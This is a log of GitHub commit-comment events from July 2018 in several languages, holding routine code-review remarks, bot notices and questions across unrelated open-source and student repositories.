{"id":"7936823255","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639685,"position":null,"line":null,"path":null,"commit_id":"134c2d41f2fdc6ca1986fcce801cf93fc59e3d37","created_at":"2018-07-09T10:42:24Z","updated_at":"2018-07-09T10:42:24Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=388)"}},"created_at":"2018-07-09T10:42:24Z"}
{"id":"7936823322","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639686,"position":null,"line":null,"path":null,"commit_id":"134c2d41f2fdc6ca1986fcce801cf93fc59e3d37","created_at":"2018-07-09T10:42:25Z","updated_at":"2018-07-09T10:42:25Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:42:25Z"}
{"id":"7936829654","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29639697,"position":27,"line":27,"path":"019/1902.html","commit_id":"f5e1be67505177707df4f97eefb9d873c89d8311","created_at":"2018-07-09T10:43:45Z","updated_at":"2018-07-09T10:43:45Z","author_association":"COLLABORATOR","body":"@c-osanai \r\nおお、いいところまできていますね！\r\nあとは本当に配列にするところだけですね。\r\n\r\nまずはJavaScriptの配列の生成方法について調べてみましょう。\r\n\r\nすでに調べていましたら下記考えてみましょう。\r\n\r\n\r\n値としては\r\n[1週目の値, 2週目の値, ....] と入っていればいいですね。\r\nでは0週目はどんな配列になっていればいいでしょうか。\r\n\r\n0週目の配列の状態に\r\n1週目は1週目の値\r\n2週目は2週目の値\r\nを順繰りに追加していけば完成しそうですね。\r\n\r\n少し考えてみましょう！またつまりましたら気軽に連絡くださいませ。"}},"created_at":"2018-07-09T10:43:45Z"}
{"id":"7936836729","type":"CommitCommentEvent","actor":{"login":"cnockemann"},"repo":{"name":"HerrAlexander/springBatchPerformanceMonitoring"},"payload":{"comment":{"id":29639714,"position":32,"line":97,"path":"src/main/java/de/viadee/spring/batch/infrastructure/SBPMConfiguration.java","commit_id":"b49ca0c7314a59291e723e2ab1ae79fcbd5d2b86","created_at":"2018-07-09T10:45:21Z","updated_at":"2018-07-09T10:45:21Z","author_association":"NONE","body":"Wenn du @PropertySource nutzt, reicht es dann hier stattdessen ein Feld anzulegen:\r\n\r\n`@Value(\"${db.password}\")\r\nString password;\r\n`"}},"created_at":"2018-07-09T10:45:21Z"}
{"id":"7936837557","type":"CommitCommentEvent","actor":{"login":"ningyuansg"},"repo":{"name":"source-academy/cadet"},"payload":{"comment":{"id":29639716,"position":24,"line":29,"path":"terraform/cadet/inputs.tf","commit_id":"d2cb217e79917320c24b08ee3128cdaf39c94eeb","created_at":"2018-07-09T10:45:31Z","updated_at":"2018-07-09T10:45:31Z","author_association":"MEMBER","body":"Nvm, I've figured out the ec2 instances have their own iam roles that they can use to access the KMS, given that KMS permissions are set correctly. No need to pass env vars."}},"created_at":"2018-07-09T10:45:31Z"}
{"id":"7936838398","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639718,"position":8,"line":528,"path":"Source/Plugins/bsfSL/BsSLFXCompiler.cpp","commit_id":"d65f1c92a03633d069d4a1f34e9632bc4de9ccd8","created_at":"2018-07-09T10:45:42Z","updated_at":"2018-07-09T10:45:42Z","author_association":"CONTRIBUTOR","body":"`assign` makes more sense, thanks."}},"created_at":"2018-07-09T10:45:42Z"}
{"id":"7936839360","type":"CommitCommentEvent","actor":{"login":"xcguang"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29639719,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-09T10:45:56Z","updated_at":"2018-07-09T10:45:56Z","author_association":"NONE","body":"Thanks for your advice, we will add it ASAP."}},"created_at":"2018-07-09T10:45:56Z"}
{"id":"7936841447","type":"CommitCommentEvent","actor":{"login":"mukuha"},"repo":{"name":"Dilan-Mel/Garage-Management-System"},"payload":{"comment":{"id":29639722,"position":null,"line":null,"path":null,"commit_id":"7ed1939ae817cb6e228d6e828dafc587d8992eb5","created_at":"2018-07-09T10:46:25Z","updated_at":"2018-07-09T10:46:25Z","author_association":"NONE","body":"what are the manager log in credentials please?"}},"created_at":"2018-07-09T10:46:25Z"}
{"id":"7936845731","type":"CommitCommentEvent","actor":{"login":"cnockemann"},"repo":{"name":"HerrAlexander/springBatchPerformanceMonitoring"},"payload":{"comment":{"id":29639736,"position":118,"line":77,"path":"src/main/java/de/viadee/spring/batch/infrastructure/DataSourceHolder.java","commit_id":"06a8f609ee12f512694529a454ef866b5c24fe97","created_at":"2018-07-09T10:47:26Z","updated_at":"2018-07-09T10:47:26Z","author_association":"NONE","body":"Wenn du @PropertySource nutzt, reicht es dann hier stattdessen ein Feld anzulegen:\r\n\r\n`@Value(\"${db.url}\") \r\nString url;\r\n`"}},"created_at":"2018-07-09T10:47:26Z"}
{"id":"7936849726","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639741,"position":null,"line":null,"path":null,"commit_id":"7b80adb12353f49295faf8e1874984ceae94f1a7","created_at":"2018-07-09T10:48:19Z","updated_at":"2018-07-09T10:48:19Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=389)"}},"created_at":"2018-07-09T10:48:19Z"}
{"id":"7936849793","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639743,"position":null,"line":null,"path":null,"commit_id":"7b80adb12353f49295faf8e1874984ceae94f1a7","created_at":"2018-07-09T10:48:19Z","updated_at":"2018-07-09T10:48:19Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:48:19Z"}
{"id":"7936850072","type":"CommitCommentEvent","actor":{"login":"gibsson"},"repo":{"name":"Freescale/meta-freescale"},"payload":{"comment":{"id":29639744,"position":14,"line":67,"path":"recipes-graphics/xorg-driver/xf86-video-imx-vivante_6.2.4.p1.2.bb","commit_id":"5f351413535dadf31d20a8dab3f04af723811645","created_at":"2018-07-09T10:48:23Z","updated_at":"2018-07-09T10:48:23Z","author_association":"CONTRIBUTOR","body":"Is this xorg video driver needed for XWayland? I'm surprised to see such patch since X11 isn't supported on mx8 currently:\r\nhttps://community.nxp.com/thread/473905#comment-1005537"}},"created_at":"2018-07-09T10:48:23Z"}
{"id":"7936861328","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639767,"position":null,"line":null,"path":null,"commit_id":"9bed641bd7828486cff7a7336d26650b7c296af3","created_at":"2018-07-09T10:50:51Z","updated_at":"2018-07-09T10:50:51Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=390)"}},"created_at":"2018-07-09T10:50:51Z"}
{"id":"7936861406","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639768,"position":null,"line":null,"path":null,"commit_id":"9bed641bd7828486cff7a7336d26650b7c296af3","created_at":"2018-07-09T10:50:52Z","updated_at":"2018-07-09T10:50:52Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:50:52Z"}
{"id":"7936865435","type":"CommitCommentEvent","actor":{"login":"leomotta121"},"repo":{"name":"leomotta121/leomotta121.github.io"},"payload":{"comment":{"id":29639777,"position":null,"line":null,"path":null,"commit_id":"8e8ce2834cdf0d2451193947e7369e0027499cfe","created_at":"2018-07-09T10:51:47Z","updated_at":"2018-07-09T10:51:47Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-09T10:51:47Z"}
{"id":"7936867613","type":"CommitCommentEvent","actor":{"login":"chfsx"},"repo":{"name":"studer-raimann/Notifications4Plugins"},"payload":{"comment":{"id":29639782,"position":null,"line":null,"path":null,"commit_id":"a4db2a91436724e04621059f89a3230e3c93a4f5","created_at":"2018-07-09T10:52:15Z","updated_at":"2018-07-09T10:52:15Z","author_association":"MEMBER","body":"@wanze absolutely, thanks for the hint ;-) that'a why we miss you (besides many other things). we will push that to the next version @theodortruffer and @mstuder could you take care of this in the ILIAS Custom Team 1? Ping back to me if you need us to do that"}},"created_at":"2018-07-09T10:52:15Z"}
{"id":"7936869278","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29639786,"position":null,"line":null,"path":null,"commit_id":"973abf52304b454e8f2220a11aa8b6c6512c44fb","created_at":"2018-07-09T10:52:38Z","updated_at":"2018-07-09T10:52:38Z","author_association":"NONE","body":"The line `#if __GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ > 0)`, gives tons of warnings when compiling with `clang-cl -Wall`:\r\n```\r\n  warning: '__GNUC__' is not defined, evaluates to 0 [-Wundef]\r\n```\r\nIsn't this better:\r\n```\r\n#defined(__GNUC__) && ( __GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ > 0))\r\n```"}},"created_at":"2018-07-09T10:52:38Z"}
{"id":"7936870525","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29639787,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-09T10:52:54Z","updated_at":"2018-07-09T10:52:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T10:52:54Z"}
{"id":"7936871046","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"ldc-developers/druntime"},"payload":{"comment":{"id":29639789,"position":34,"line":215,"path":"src/rt/sections_android.d","commit_id":"5f7f87391bc8189500925adc938b257631352916","created_at":"2018-07-09T10:53:02Z","updated_at":"2018-07-09T10:53:02Z","author_association":"MEMBER","body":"Where do these come from (our modded LLVM?), and why are they 32-bit for AArch64?"}},"created_at":"2018-07-09T10:53:02Z"}
{"id":"7936871485","type":"CommitCommentEvent","actor":{"login":"agherzan"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":29639791,"position":null,"line":null,"path":null,"commit_id":"e713c3f60d74fbb864122f8f11a80ca302d53da3","created_at":"2018-07-09T10:53:09Z","updated_at":"2018-07-09T10:53:09Z","author_association":"OWNER","body":"@kraj do you have the time to check it out? And if that is the case indeed, we can push it back."}},"created_at":"2018-07-09T10:53:09Z"}
{"id":"7936872844","type":"CommitCommentEvent","actor":{"login":"jasonrpoteet"},"repo":{"name":"supasate/connected-react-router"},"payload":{"comment":{"id":29639799,"position":null,"line":null,"path":null,"commit_id":"3f0babc5565704cb19ef0d2eb1958420b89a3bd4","created_at":"2018-07-09T10:53:26Z","updated_at":"2018-07-09T10:53:26Z","author_association":"NONE","body":"When will these updates get published to NPM?"}},"created_at":"2018-07-09T10:53:26Z"}
{"id":"7936879343","type":"CommitCommentEvent","actor":{"login":"karthick111"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29639819,"position":null,"line":null,"path":null,"commit_id":"9c9bbb00bd6816138c7f266b674540e44b0bc0ee","created_at":"2018-07-09T10:54:50Z","updated_at":"2018-07-09T10:54:50Z","author_association":"COLLABORATOR","body":"He's busy with xiaomeme sources "}},"created_at":"2018-07-09T10:54:50Z"}
{"id":"7936879485","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29639820,"position":59,"line":178,"path":"docs/chapters/deploying.tex","commit_id":"64f887200bbcbda98194de43ddde7cbc5204f5f7","created_at":"2018-07-09T10:54:52Z","updated_at":"2018-07-09T10:54:52Z","author_association":"OWNER","body":"Good idea! :wink: "}},"created_at":"2018-07-09T10:54:52Z"}
{"id":"7936890595","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639845,"position":null,"line":null,"path":null,"commit_id":"e159998d377ef19e5a75346007a45c891a6d3e9d","created_at":"2018-07-09T10:57:18Z","updated_at":"2018-07-09T10:57:18Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=391)"}},"created_at":"2018-07-09T10:57:18Z"}
{"id":"7936890768","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639846,"position":null,"line":null,"path":null,"commit_id":"e159998d377ef19e5a75346007a45c891a6d3e9d","created_at":"2018-07-09T10:57:20Z","updated_at":"2018-07-09T10:57:20Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:57:20Z"}
{"id":"7936896818","type":"CommitCommentEvent","actor":{"login":"chfsx"},"repo":{"name":"studer-raimann/Notifications4Plugins"},"payload":{"comment":{"id":29639858,"position":null,"line":null,"path":null,"commit_id":"a4db2a91436724e04621059f89a3230e3c93a4f5","created_at":"2018-07-09T10:58:44Z","updated_at":"2018-07-09T10:58:44Z","author_association":"MEMBER","body":"@wanze sorry I saw this was an oder comment from you which just poped up 😊"}},"created_at":"2018-07-09T10:58:44Z"}
{"id":"7936901124","type":"CommitCommentEvent","actor":{"login":"manio"},"repo":{"name":"stevegolton/librouteros"},"payload":{"comment":{"id":29639867,"position":null,"line":null,"path":null,"commit_id":"d7c1de0a8b810853a48b9fc741d4c8492e597590","created_at":"2018-07-09T10:59:43Z","updated_at":"2018-07-09T10:59:43Z","author_association":"NONE","body":"Steve,\r\nI can see you did some work regarding socket and connections in your fork. What do you think about upstreaming it? Did you think of it?\r\n\r\ncc @rpv-tomsk"}},"created_at":"2018-07-09T10:59:43Z"}
{"id":"7936901600","type":"CommitCommentEvent","actor":{"login":"lars-petter-hauge"},"repo":{"name":"jokva/talks"},"payload":{"comment":{"id":29639869,"position":null,"line":null,"path":null,"commit_id":"2f78fdf0caa077d15989da4e04afca034ca28a0b","created_at":"2018-07-09T10:59:50Z","updated_at":"2018-07-09T10:59:50Z","author_association":"NONE","body":"the the lessons learned"}},"created_at":"2018-07-09T10:59:50Z"}
{"id":"7936904581","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639889,"position":1,"line":1,"path":".idea/misc.xml","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:00:28Z","updated_at":"2018-07-09T11:00:28Z","author_association":"NONE","body":"delete .idea folder from repository"}},"created_at":"2018-07-09T11:00:28Z"}
{"id":"7936907386","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639894,"position":5,"line":5,"path":"src/Main.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:01:05Z","updated_at":"2018-07-09T11:01:05Z","author_association":"NONE","body":"Move those code to unit tests"}},"created_at":"2018-07-09T11:01:05Z"}
{"id":"7936909725","type":"CommitCommentEvent","actor":{"login":"patilarpith"},"repo":{"name":"interviewstreet/languages"},"payload":{"comment":{"id":29639899,"position":null,"line":null,"path":null,"commit_id":"561f4d7c473f03d738307be8817854c78bd78bea","created_at":"2018-07-09T11:01:36Z","updated_at":"2018-07-09T11:01:36Z","author_association":"MEMBER","body":"@RudraNilBasu You will need to add lein recipe in metadata dependency "}},"created_at":"2018-07-09T11:01:36Z"}
{"id":"7936909983","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639900,"position":8,"line":8,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:01:40Z","updated_at":"2018-07-09T11:01:40Z","author_association":"NONE","body":"Why do you need this default constructor?"}},"created_at":"2018-07-09T11:01:40Z"}
{"id":"7936911314","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639905,"position":13,"line":248,"path":"Source/Foundation/bsfCore/CoreThread/BsCoreObject.h","commit_id":"1516903bdbd7280cd44567814af12b79252b53cc","created_at":"2018-07-09T11:01:58Z","updated_at":"2018-07-09T11:01:58Z","author_association":"CONTRIBUTOR","body":"It's named but in another file that I didn't want to include since this is a common header. I'll move the definition somewhere where both can see it."}},"created_at":"2018-07-09T11:01:58Z"}
{"id":"7936911962","type":"CommitCommentEvent","actor":{"login":"domq"},"repo":{"name":"antistatique/epfl-theme"},"payload":{"comment":{"id":29639906,"position":null,"line":null,"path":null,"commit_id":"8542bcd8676214e8f98a776c29c3e1b3f3f7e8a8","created_at":"2018-07-09T11:02:08Z","updated_at":"2018-07-09T11:02:08Z","author_association":"NONE","body":"Sachant que renderNews n'est appelée que par add_action(), sa valeur de retour est ignorée. Du coup, je ne comprends pas pourquoi on rajoute ici des appels à ob_start() / ob_end_flush() ?"}},"created_at":"2018-07-09T11:02:08Z"}
{"id":"7936913442","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639907,"position":28,"line":28,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:02:26Z","updated_at":"2018-07-09T11:02:26Z","author_association":"NONE","body":"name not so clear"}},"created_at":"2018-07-09T11:02:26Z"}
{"id":"7936914828","type":"CommitCommentEvent","actor":{"login":"henrichg"},"repo":{"name":"henrichg/PhoneProfilesPlus"},"payload":{"comment":{"id":29639911,"position":null,"line":null,"path":null,"commit_id":"75dd9aa1336a4e5bf9c3f614d9898cde02d0afdb","created_at":"2018-07-09T11:02:45Z","updated_at":"2018-07-09T11:02:45Z","author_association":"OWNER","body":"Version 3.6.1."}},"created_at":"2018-07-09T11:02:45Z"}
{"id":"7936917690","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639920,"position":33,"line":33,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:03:21Z","updated_at":"2018-07-09T11:03:21Z","author_association":"NONE","body":"Do you really need 'else' block?"}},"created_at":"2018-07-09T11:03:21Z"}
{"id":"7936919969","type":"CommitCommentEvent","actor":{"login":"patilarpith"},"repo":{"name":"interviewstreet/languages"},"payload":{"comment":{"id":29639922,"position":null,"line":null,"path":null,"commit_id":"561f4d7c473f03d738307be8817854c78bd78bea","created_at":"2018-07-09T11:03:51Z","updated_at":"2018-07-09T11:03:51Z","author_association":"MEMBER","body":"Override these settings from the lein recipe\r\n```\r\n:home           => \"/home/vagrant\",\r\n  :user           => \"vagrant\",\r\n```"}},"created_at":"2018-07-09T11:03:51Z"}
{"id":"7936920688","type":"CommitCommentEvent","actor":{"login":"philippjfr"},"repo":{"name":"pyviz/nbsite"},"payload":{"comment":{"id":29639924,"position":null,"line":null,"path":null,"commit_id":"2b1eb7f5d983a491aad575c6f0afe6aadf34ad98","created_at":"2018-07-09T11:04:01Z","updated_at":"2018-07-09T11:04:01Z","author_association":"CONTRIBUTOR","body":"> @philippjfr said that setting fqdn fixed the clobbering of CNAME for hvplot and that is also specified in the deploy section as you can see here.\r\n\r\nYou will note that hvplot has only one subsection under deploy while nbsite deploys on dev tags and regular tags and you put the entry under the dev section. The fix in #60 looks good."}},"created_at":"2018-07-09T11:04:01Z"}
{"id":"7936921083","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29639925,"position":null,"line":null,"path":null,"commit_id":"eeebe587ba4a899a10972c23a8e630ffa012e5d7","created_at":"2018-07-09T11:04:06Z","updated_at":"2018-07-09T11:04:06Z","author_association":"COLLABORATOR","body":"@agriggio Alberto, the last saved profile should have the correct tone curve and the matching can be skipped, while applying a profile != last saved should not skip the matching (for example if the profile has a different setting in colour management). "}},"created_at":"2018-07-09T11:04:06Z"}
{"id":"7936921407","type":"CommitCommentEvent","actor":{"login":"hacker1024"},"repo":{"name":"TheMuppets/proprietary_vendor_xiaomi"},"payload":{"comment":{"id":29639926,"position":null,"line":null,"path":null,"commit_id":"22b90bc278004f5ee2270ec2a425b44090d2c2d6","created_at":"2018-07-09T11:04:11Z","updated_at":"2018-07-09T11:04:11Z","author_association":"NONE","body":"Why is this necessary? It causes errors for me."}},"created_at":"2018-07-09T11:04:11Z"}
{"id":"7936922197","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639929,"position":29,"line":29,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:04:21Z","updated_at":"2018-07-09T11:04:21Z","author_association":"NONE","body":"This is OK. Also you can try implement this using Stream API"}},"created_at":"2018-07-09T11:04:21Z"}
{"id":"7936922463","type":"CommitCommentEvent","actor":{"login":"dprat0821"},"repo":{"name":"norchain/NEOGameComp"},"payload":{"comment":{"id":29639930,"position":null,"line":null,"path":null,"commit_id":"7a76b9539bfe1812897920cd8f4bf569badd3be7","created_at":"2018-07-09T11:04:24Z","updated_at":"2018-07-09T11:04:24Z","author_association":"MEMBER","body":"Great work but still need to think about more.\r\n1. need to check if the card is not allocated in any war. Otherwise, it's untradable.\r\n2. need to check if the card is still live (in cardAct \"list\"). If it's already dead (merged). we cannot transfer or trade it.\r\n3. the parameter of currentOwnerId is unnecessary since it can be retrieved from card info.\r\n4. the signature should be checked since we need to ensure the owner's identity. Otherwise, anyone can take the asset out of your pocket.\r\n\r\nFor the transaction signature, pls refer to NEP-5 templates. "}},"created_at":"2018-07-09T11:04:24Z"}
{"id":"7936922986","type":"CommitCommentEvent","actor":{"login":"fantasiamx"},"repo":{"name":"fantasiamx/regame"},"payload":{"comment":{"id":29639933,"position":1,"line":1,"path":"README.md","commit_id":"9cb18795c488106d2aa6018b3c0a7c9ee4466554","created_at":"2018-07-09T11:04:31Z","updated_at":"2018-07-09T11:04:31Z","author_association":"OWNER","body":"Print \"hello world\""}},"created_at":"2018-07-09T11:04:31Z"}
{"id":"7936923777","type":"CommitCommentEvent","actor":{"login":"ncaaseawolf"},"repo":{"name":"ThatLing/tg-rebase"},"payload":{"comment":{"id":29639936,"position":null,"line":null,"path":null,"commit_id":"dab6e99380f7a19a4d498b502cb04e8756a9793e","created_at":"2018-07-09T11:04:42Z","updated_at":"2018-07-09T11:04:42Z","author_association":"NONE","body":"yes please"}},"created_at":"2018-07-09T11:04:42Z"}
{"id":"7936928054","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639945,"position":162,"line":630,"path":"Source/Foundation/bsfCore/Renderer/BsRenderable.cpp","commit_id":"1516903bdbd7280cd44567814af12b79252b53cc","created_at":"2018-07-09T11:05:34Z","updated_at":"2018-07-09T11:05:34Z","author_association":"CONTRIBUTOR","body":"I'm only aware of `static_cast` offering additional safety when casting between invalid types. Perhaps I'm wrong but `reinterpret_cast` seems to be just as unsafe as c-style cast. So generally I try to use the simpler syntax."}},"created_at":"2018-07-09T11:05:34Z"}
{"id":"7936929596","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29639949,"position":null,"line":null,"path":null,"commit_id":"a22c6cfa834510191e64e99270b85bbfe8be0ee3","created_at":"2018-07-09T11:05:53Z","updated_at":"2018-07-09T11:05:53Z","author_association":"OWNER","body":"@nfeske I have another simple game that is playable without sound, this is a Game Boy emulator packaged with a default cartridge."}},"created_at":"2018-07-09T11:05:53Z"}
{"id":"7936929659","type":"CommitCommentEvent","actor":{"login":"mohyour"},"repo":{"name":"mishuvs/open-event-server"},"payload":{"comment":{"id":29639950,"position":44,"line":44,"path":"app/api/schema/events-orga.py","commit_id":"a9da0a48ce63f179533e9e7178b2e279111e092e","created_at":"2018-07-09T11:05:54Z","updated_at":"2018-07-09T11:05:54Z","author_association":"NONE","body":"Your class should inherit from EventOrgaSchemaPublic not EventSchemaPublic"}},"created_at":"2018-07-09T11:05:54Z"}
{"id":"7936932220","type":"CommitCommentEvent","actor":{"login":"mohyour"},"repo":{"name":"mishuvs/open-event-server"},"payload":{"comment":{"id":29639954,"position":51,"line":51,"path":"app/api/schema/events-orga.py","commit_id":"a9da0a48ce63f179533e9e7178b2e279111e092e","created_at":"2018-07-09T11:06:30Z","updated_at":"2018-07-09T11:06:30Z","author_association":"NONE","body":"Check the endpoint"}},"created_at":"2018-07-09T11:06:30Z"}
{"id":"7936933854","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639959,"position":86,"line":86,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:06:52Z","updated_at":"2018-07-09T11:06:52Z","author_association":"NONE","body":"Use System.arrayCopy(). This code is redundant."}},"created_at":"2018-07-09T11:06:52Z"}
{"id":"7936934571","type":"CommitCommentEvent","actor":{"login":"Yivan"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29639960,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-09T11:07:02Z","updated_at":"2018-07-09T11:07:02Z","author_association":"CONTRIBUTOR","body":"@brush thanks for the fix on the code snippet example. But you put `maxmemory gb` (not 1gb) on the two pages (requirements and cache pages)... does it work like this or is it a typo missing to be fixed in the doc ?"}},"created_at":"2018-07-09T11:07:02Z"}
{"id":"7936935949","type":"CommitCommentEvent","actor":{"login":"mohyour"},"repo":{"name":"mishuvs/open-event-server"},"payload":{"comment":{"id":29639969,"position":40,"line":40,"path":"app/api/events-orga.py","commit_id":"a9da0a48ce63f179533e9e7178b2e279111e092e","created_at":"2018-07-09T11:07:20Z","updated_at":"2018-07-09T11:07:20Z","author_association":"NONE","body":"self.schema should be equal to the eventorga one you created"}},"created_at":"2018-07-09T11:07:20Z"}
{"id":"7936936821","type":"CommitCommentEvent","actor":{"login":"mohyour"},"repo":{"name":"mishuvs/open-event-server"},"payload":{"comment":{"id":29639972,"position":42,"line":42,"path":"app/api/events-orga.py","commit_id":"a9da0a48ce63f179533e9e7178b2e279111e092e","created_at":"2018-07-09T11:07:32Z","updated_at":"2018-07-09T11:07:32Z","author_association":"NONE","body":"self.schema should be equal to the eventorga public one you created"}},"created_at":"2018-07-09T11:07:32Z"}
{"id":"7936938602","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639973,"position":92,"line":92,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:07:56Z","updated_at":"2018-07-09T11:07:56Z","author_association":"NONE","body":"Read List::add() contract, you don't need to catch exception"}},"created_at":"2018-07-09T11:07:56Z"}
{"id":"7936940693","type":"CommitCommentEvent","actor":{"login":"DataMindCzPrivate"},"repo":{"name":"DataMindCzPrivate/Component_documentation"},"payload":{"comment":{"id":29639979,"position":null,"line":null,"path":null,"commit_id":"8ff779b33d46a8d8906e2158cf906348df7046c7","created_at":"2018-07-09T11:08:24Z","updated_at":"2018-07-09T11:08:24Z","author_association":"OWNER","body":"adding comment to output"}},"created_at":"2018-07-09T11:08:24Z"}
{"id":"7936940805","type":"CommitCommentEvent","actor":{"login":"mohyour"},"repo":{"name":"mishuvs/open-event-server"},"payload":{"comment":{"id":29639980,"position":12,"line":12,"path":"app/api/events-orga.py","commit_id":"a9da0a48ce63f179533e9e7178b2e279111e092e","created_at":"2018-07-09T11:08:26Z","updated_at":"2018-07-09T11:08:26Z","author_association":"NONE","body":"import the event schemas you created, so you can use them on line 40 and 42"}},"created_at":"2018-07-09T11:08:26Z"}
{"id":"7936941474","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639983,"position":73,"line":73,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:08:35Z","updated_at":"2018-07-09T11:08:35Z","author_association":"NONE","body":"Throw exceptions to user. Read method's contracts!"}},"created_at":"2018-07-09T11:08:35Z"}
